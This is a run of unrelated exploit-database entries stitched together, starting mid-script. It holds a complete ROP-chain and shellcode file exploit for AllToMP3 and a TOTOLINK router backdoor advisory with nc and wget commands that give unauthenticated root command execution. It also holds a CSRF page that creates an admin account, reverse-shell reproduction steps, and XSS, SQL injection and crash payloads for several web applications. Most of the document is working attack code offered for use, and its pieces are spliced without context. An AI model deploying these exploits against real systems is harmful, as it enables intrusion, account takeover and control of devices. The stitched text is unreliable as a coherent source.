z3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh"
####################### STACK PIVOT ###########################
SEH = struct.pack("<I", 0x005CE870) # 0x005CE870 add esp 0x800, 4 pops, ret [alltomp3.exe]
####################### 1. Get Stack Pointer to point to ZZZZ ###########################
ROP = struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xffffff1c)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to ZZZZ
####################### 2. Get and set ZZZZ to HeapCreate ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 3. Set RET ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)
ROP += struct.pack("<I", 0x1001939e) # 0x1001939e: add esp, 0x000001A0 ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
####################### 4. Go to HeapCreate ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffea4)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret ; (1 found) // pad it
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 5. Get Stack Pointer to point to YYYY ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffe58)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to YYYY
####################### 6. Get and set YYYY to HeapAlloc ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 7. Set RET ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)
ROP += struct.pack("<I", 0x10014d32) # 0x10014d32: add esp, 0x00000280 ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 8. Set hHEAP ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) <- should return here and start executing here
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
####################### 9. Go to HeapAlloc ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffdcc)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret ; (1 found) // pad it
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 10. Get Stack Pointer to point to DDDD ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffd5c)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to DDDD
####################### 12. Set RET ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += b"A"*0x10
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 13. DESTIN ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]*
####################### 14. SOURCE ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0x000000a0)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 15. GOTO _memcpy_s ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffc94)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
####################### SHELLCODE ###########################
shellcode = b"\xcc" * 400
real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"
real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"
real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"
real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"
real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"
real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"
real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"
real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"
real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"
real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"
real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"
real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"
real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"
real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"
real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"
real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"
real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"
real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"
real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"
real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"
####################### CONSTRUCT ###########################
SIZE = 500
start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))
start_of_padding += shellcode
start_of_padding += EXE
SIZE = 1500
RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET
#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3 ; pop esi ; ret ; (1 found)
INT = struct.pack("I", 0x1003c6aa)*2
rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172
rest_of_payload += b"\x90" * 100
rest_of_payload += real_shellcode
rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))
payload = junk + SEH + start_of_padding + rest_of_payload
REST = b"\x44" * (size-len(payload))
payload += REST
file = open("1.wav", "wb")
file.write(payload)
file.close()
# # # # #
# Vulnerability: Improper Access Restrictions
# Date: 15.01.2017
# Vendor Homepage: http://theninehertz.com
# Script Name: 9 network Linkedin Clone – Classified Ads Script
# Script Version: v1.0
# Script Buy Now: http://theninehertz.com/linkedin-clone
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/MyCP/welcome.php
# http://localhost/[PATH]/MyCP/industry-list.php
# http://localhost/[PATH]/MyCP/active_user.php
# http://localhost/[PATH]/MyCP/deactive_user.php
# http://localhost/[PATH]/MyCP/unverified_user.php
# http://localhost/[PATH]/MyCP/job-list.php
# http://localhost/[PATH]/MyCP/job-pack.php
# Vs.......
# # # # #
## Advisory Information
Title: Backdoor and RCE found in 8 TOTOLINK router models
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE
## Product Description
TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
markets in South Korea.
TOTOLINK produces routers routers, wifi access points and network
devices. Their products are sold worldwide.
## Vulnerabilities Summary
A backdoor is present in several TOTOLINK products.
This was confirmed by analysing the latest firmwares and by testing
the backdoor against live routers.
At least 8 TOTOLINK products are affected (firmwares come from
totolink.net and from totolink.cn):
- A850R-V1 : until last firwmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web
- F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web
- F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web
- N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
- N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
- N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
- N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
- N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web
By sending a crafted request to the WAN IP, an attacker will open the
HTTP remote management interface on the Internet.
Then an attacker can use a Remote Code Execution in the HTTP remote
management interface by using the hidden /boafrm/formSysCmd form,
bypassing the authentication system.
We estimate there are =~ 50 000 routers affected by this backdoor.
## Details - backdoor
The init.d script executes the /bin/skt binary when the router starts:
cat etc/init.d/rcS
[...]
# start web server
boa
skt&
skt is a small MIPS binary which is a client/server program. The arguments are:
server: ./skt
client: ./skt host cmd
The binary can be used in x86_64 machines using QEMU: sudo chroot .
./qemu-mips-static ./bin/skt
Using skt without argument will launch a TCP daemon on port 5555 in
every interface (including WAN), acting as an ECHO server.
Using skt with arguments will send a TCP packet containing the command
to the specified IP on port 5555.
The analysis of the binary running on the TOTOLINK devices (for more
details, read
https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html
) shows the server mode responds to 3 commands by silently executing
system() in the background:
o By sending "hel,xasf" to the device, the device will execute:
iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT
This will open the HTTP remote management interface on port 80 in
the eth1 interface which is the WAN interface by default.
o By sending "oki,xasf" to the device, the device will execute:
iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT
This will close the HTTP remote management interface.
o By sending "bye,xasf" to the device, the device will do nothing
The iptables commands in the backdoor are hardcoded with "eth1".
Only devices using DHCP and static IP connections are affected because
the WAN IP is attached on the eth1 device.
It does not affect devices using PPPoE connections, because the WAN IP
is attached on the ppp device, as seen below:
totolink# ifconfig
ppp0 Link encap:Point-to-Point Protocol
inet addr:X.X.X.X P-t-P:X.X.X.X Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1438 Metric:1
RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:64
RX bytes:2803138455 (2.6 GiB) TX bytes:277402492 (264.5 MiB)
An attacker can use these simple netcat commands to test the backdoor:
To open the HTTP remote management interface on the Internet:
echo -ne "hel,xasf" | nc <ip> 5555
To close the HTTP remote management interface on the Internet:
echo -ne "oki,xasf" | nc <ip> 5555
To detect a vulnerable router:
echo -ne "GET / HTTP/1.1" | nc <ip> 5555
if you see "GET / HTTP/1.1" in the answer, you likely detected a
vulnerable router.
## Details - RCE in the management interface
A hidden form in the latest firmware allows an attacker to execute
commands as root by sending a HTTP request:
POST /boafrm/formSysCmd HTTP/1.1
sysCmd=<cmd>&apply=Apply&msg=
An attacker can use wget to execute commands in the remote device:
wget --post-data='sysCmd=<cmd>&apply=Apply&msg='
http://ip//boafrm/formSysCmd
For instance, sending this HTTP request to the management interface
will reboot the device:
POST /boafrm/formSysCmd HTTP/1.1
sysCmd=reboot&apply=Apply&msg=
This wget command will do the same job:
wget --post-data='sysCmd=reboot&apply=Apply&msg='
http://ip//boafrm/formSysCmd
## Vendor Response
TOTOLINK was not contacted in regard of this case.
## Report Timeline
* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
* Jun 26, 2015: Working PoCs with RCE.
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.
## Credit
These vulnerabilities were found by Alexandre Torres and Pierre Kim
(@PierreKimSec).
## References
https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
## Disclaimer
This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
# Date: 2019-04-14
# Exploit Author: ax8
# Vendor Homepage: https://github.com/Li-Siyuan
# Software Link: http://www.74cms.com/download/index.html
# Version: v5.0.1
# CVE : CVE-2019-11374
74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.
<!--poc.html(creat a administrater)-->
<!DOCTYPE html>
<html>
<head>
<title> CSRF Proof</title>
<script type="text/javascript">
function exec1(){
document.getElementById('form1').submit();
}
</script>
</head>
<body onload="exec1();">
<form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">
<input type="hidden" name="username" value="hacker1" />
<input type="hidden" name="email" value="111111111@qq.com" />
<input type="hidden" name="password" value="hacker1" />
<input type="hidden" name="repassword" value="hacker1" />
<input type="hidden" name="role_id" value="1" />
</form>
</body>
</html>
# Exploit Title: 7 Tik 1.0.1.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NQL2QC8S935
# Version: 1.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Go to search page
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 7700
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 12.09.2023
# Vendor Homepage: http://www.7stickynotes.com
# Software Link:
http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe
# Tested Version: 1.9 (latest)
# Tested on: Windows 2019 Server 64bit
# # # Steps to Reproduce # # #
# Open the program.
# Click on "New Note".
# Navigate to the "Alarms" tab.
# Click on either of the two buttons.
# From the "For" field, select "1" and "seconds" (to obtain the shell
within 1 second).
# From the "Action" dropdown, select "command".
# In the activated box, enter the reverse shell command and click the "Set"
button to set the alarm.
# Finally, click on the checkmark to save the alarm.
# Reverse shell obtained!
source: https://www.securityfocus.com/bid/50050/info
6KBBS is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
6KBBS 8.0 build 20101201 is vulnerable; other versions may also be affected.
http://www.example.com/credits.php?'[XSS]
http://www.example.com/forum.php?'[XSS]
http://www.example.com/index.php?'[XSS]
http://www.example.com/login.php?'[XSS]
http://www.example.com/online.php?'[XSS]
http://www.example.com/getfiles.php?f=http://xxx&t=js
http://www.example.com/admin/portalcollect.php?f=http://xxx&t=js
# Exploit Title: 60CycleCMS - 'news.php' Multiple vulnerability
# Google Dork: N/A
# Date: 2020-02-10
# Exploit Author: Unkn0wn
# Vendor Homepage: http://davidvg.com/
# Software Link: https://www.opensourcecms.com/60cyclecms
# Version: 2.5.2
# Tested on: Ubuntu
# CVE : N/A
---------------------------------------------------------
SQL Injection vulnerability:
----------------------------
in file /common/lib.php Line 64 -73
*
function getCommentsLine($title)
{
$title = addslashes($title);
$query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'";
// query MySQL server
$result=mysql_query($query) or die("MySQL Query fail: $query");
$numComments = mysql_num_rows($result);
$encTitle = urlencode($title);
return '<a href="post.php?post=' . $encTitle . '#comments" >' . $numComments . ' comments</a>';
}
lib.php line 44:
*
$query = "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `entry_id` ='$title' ORDER BY `timestamp` ASC";
*
*
news.php line 3:
*
require 'common/lib.php';
*
Then in line 15 return query us:
*
$query = "SELECT MAX(`timestamp`) FROM `entries
*
http://127.0.0.1/news.php?title=$postName[SQL Injection]
----------------------------
Cross Site-Scripting vulnerability:
File news.php in line: 136-138 :
*
$ltsu = $_GET["ltsu"];
$etsu = $_GET["etsu"];
$post = $_GET["post"];
*
get payload us and printEnerty.php file in line 26-27:
*
<? echo '<a class="navLink" href="index.php?etsu=' . $etsu . '">Older ></a>';
<? echo '<a class="navLink" href="index.php?ltsu=' . 0 . '">Oldest >>|</a>';
*
print it for us!
http://127.0.0.1/index.php?etsu=[XSS Payloads]
http://127.0.0.1/index.php?ltsu=[XSS Payloads]
----------------------------------------------------------
# Contact : 0x9a@tuta.io
# Visit: https://t.me/l314XK205E
# @ 2010 - 2020
# Underground Researcher
# Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting
# Date: 30-12-2020
# Exploit Author: Ritesh Gohil
# Vendor Homepage: https://www.4homepages.de/
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.7.11
# Tested on: Windows 10/Kali Linux
Vulnerable Parameters: Profile Image.
Attack Vector:
This vulnerability can results attacker to inject the XSS payload into the IMAGE URL and each time
any user will go to that URL, the XSS triggers, and the attacker can able to steal the cookie according to the crafted payload.
Steps-To-Reproduce:
1. Login into 4images admin panel.
2. Now go to the add images tab.
3. Now paste the below payload in the URL field.
ritesh"><img src=x onerror=confirm(1)>
4. Now click on add button.
5. The XSS will be triggered.
# Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.9
# Tested on: Ubuntu 20.04
To reproduce do the following:
1. Login as administrator user
2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d=
efault_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=3D1"
// HTTP POST request showing reverse shell payload
POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
__csrf=3Dc39b7dea0ff15442681362d2a583c7a9&action=3Dsavetemplate&content=3D[=
REVERSE_SHELL_CODE]&template_file_name=3Dcategories.html&template_folder=3D=
default_960px[...]
